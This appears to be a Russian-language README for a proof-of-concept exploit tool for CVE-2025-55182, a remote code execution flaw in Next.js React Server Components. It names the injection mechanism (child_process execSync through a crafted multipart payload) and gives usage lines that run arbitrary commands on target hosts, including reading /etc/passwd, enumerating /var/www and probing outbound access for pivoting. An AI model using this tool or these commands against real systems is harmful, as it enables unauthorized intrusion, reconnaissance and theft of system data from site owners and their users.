
POC-CVE-2025-55182
Полнофункциональная утилита для эксплуатации CVE-2025-55182 — удаленное выполнение кода через React Server Components в Next.js.
Сканер автоматически создает multipart-полезную нагрузку и использует process.mainModule.require('child_process').execSync() для выполнения произвольных команд ОС на уязвимых экземплярах.
chmod +x scanner.sh
# Стандартное сканирование (выполняет 'id')
./scanner.sh -d vulnerable-app.com
# Выполнение пользовательской команды
./scanner.sh -d vulnerable-app.com -c "whoami"
# С явным протоколом
./scanner.sh -d http://localhost:3000 -c "cat /etc/passwd"
# Проверка RCE
./scanner.sh -d shop.example.com
# Определение системы
./scanner.sh -d shop.example.com -c "uname -a"
# Перечисление доступных для записи путей
./scanner.sh -d shop.example.com -c "ls -la /var/www"
# Вспомогательный pivot — проверка исходящего доступа
./scanner.sh -d shop.example.com -c "ping -c 4 google.com"
Не стесняйтесь обращаться по адресу mailto:[email protected]